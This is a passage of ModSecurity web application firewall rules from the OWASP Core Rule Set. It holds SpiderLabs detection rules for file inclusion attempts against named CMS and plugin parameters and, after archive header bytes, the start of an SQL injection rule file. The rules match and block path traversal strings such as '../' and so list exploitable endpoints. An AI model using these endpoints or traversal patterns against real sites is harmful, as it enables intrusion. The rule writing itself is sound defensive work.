inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:class_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SaurusCMS captcha_image.php script Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012750) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OrangeHRM path Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /plugins/PluginController.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012750,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS OrangeHRM path Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:path "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OrangeHRM path Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012794) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClanSphere CurrentFolder Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /mods/ckeditor/filemanager/connectors/php/connector.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012794,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ClanSphere CurrentFolder Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,47636'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:CurrentFolder "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClanSphere CurrentFolder Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012795) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Golem Gaming Portal root_path Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /admin/admin_news_bot.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012795,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Golem Gaming Portal root_path Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:root_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Golem Gaming Portal root_path Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012837) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_mgm Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_mgm/help.mgm.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012837,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_mgm Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_mgm Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012877) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e107 HANDLERS_DIRECTORY Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /e107_handlers/secure_img_handler.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012877,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS e107 HANDLERS_DIRECTORY Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:HANDLERS_DIRECTORY/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e107 HANDLERS_DIRECTORY Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012878) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e107 IMAGES_DIRECTORY Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /e107_handlers/secure_img_handler.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012878,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS e107 IMAGES_DIRECTORY Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:IMAGES_DIRECTORY/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e107 IMAGES_DIRECTORY Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012879) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e107 imgp Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /e107_handlers/secure_img_handler.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012879,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS e107 imgp Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:imgp/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e107 imgp Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012880) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e107 trackback_url Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /e107_plugins/trackback/trackbackClass.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012880,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS e107 trackback_url Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:trackback_url/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e107 trackback_url Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012881) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e107 permLink Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /e107_plugins/trackback/trackbackClass.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012881,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS e107 permLink Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:permLink/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e107 permLink Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012945) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS nvisionix Roaming System sessions.php script Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /authenticate/sessions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012945,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS nvisionix Roaming System sessions.php script Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:globalIncludeFilePath "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS nvisionix Roaming System sessions.php script Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012948) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012948,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jmsfileseller" "chain" SecRule ARGS:view "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012949) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Opencadastre soustab.php script Local File Inclusion Vulnerability SecRule REQUEST_LINE "@contains /scr/soustab.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012949,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Opencadastre soustab.php script Local File Inclusion Vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:dsn[phptype] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Opencadastre soustab.php script Local File Inclusion Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012950) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openscrutin droit.class.php path_om Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains droit.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012950,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Openscrutin droit.class.php path_om Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openscrutin droit.class.php path_om Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012951) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openscrutin collectivite.class.php path_om Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /collectivite.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012951,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Openscrutin collectivite.class.php path_om Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openscrutin collectivite.class.php path_om Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012952) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openscrutin utilisateur.class.php path_om Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /utilisateur.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012952,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Openscrutin utilisateur.class.php path_om Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openscrutin utilisateur.class.php path_om Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012953) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openscrutin courrier.class.php path_om Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /courrier.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012953,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Openscrutin courrier.class.php path_om Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openscrutin courrier.class.php path_om Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012954) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openscrutin profil.class.php path_om Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /profil.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012954,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Openscrutin profil.class.php path_om Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openscrutin profil.class.php path_om Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012993) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PEAR include_path Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /pear.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012993,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS PEAR include_path Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:include_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PEAR include_path Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012994) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PEAR_PHPDIR Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /pear.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012994,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS PEAR_PHPDIR Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:_PEAR_PHPDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PEAR_PHPDIR Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012995) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012995,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_people" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013087) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS impressCMS FCKeditor root_path Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /editors/FCKeditor/editor_registry.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013087,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS impressCMS FCKeditor root_path Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:root_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS impressCMS FCKeditor root_path Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013088) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS impressCMS tinymce root_path Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /editors/tinymce/editor_registry.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013088,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS impressCMS tinymce root_path Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:root_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS impressCMS tinymce root_path Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013089) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS impressCMS dhtmltextarea root_path Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /editors/dhtmltextarea/editor_registry.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013089,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS impressCMS dhtmltextarea root_path Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:root_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS impressCMS dhtmltextarea root_path Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013308) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013308,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:page/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013309) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013309,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:page "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013433) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013433,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jfeedback" "chain" SecRule ARGS:controller "(?i:\\x2e\\x2e\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013464) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/ungallery/source_vuln.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013464,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pic "(?i:\\x2e\\x2e\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013465) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EasySiteEdit langval Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /sublink.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013465,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS EasySiteEdit langval Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:langval/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EasySiteEdit langval Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2013466) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DiY-CMS lang Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /modules/guestbook/blocks/control.block.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013466,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS DiY-CMS lang Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:lang/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DiY-CMS lang Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" SecMarker END_SLR_ET_RFI_RULES ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_crs_46_slr_et_sqli_attacks.conf������0000664�0000000�0000000�00002065016�12164572564�0033260�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This ruleset was created by Trustwave SpiderLabs Research Team and includes data from: # # http://www.emergingthreats.net/ # SecRule REQUEST_FILENAME "!@pmFromFile modsecurity_46_slr_et_sqli.data" "id:'2000004',phase:2,nolog,pass,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,skipAfter:END_SLR_ET_SQLI_RULES" # (2011219) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Campsite article_id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /plugins/campsiteattachment/attachments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011219,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Campsite article_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:article_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Campsite article_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007515) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp categoryID_list UPDATE SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007515,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp categoryID_list UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'" SecRule &TX:'/SQL_INJECTION.*ARGS:categoryID_list/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto 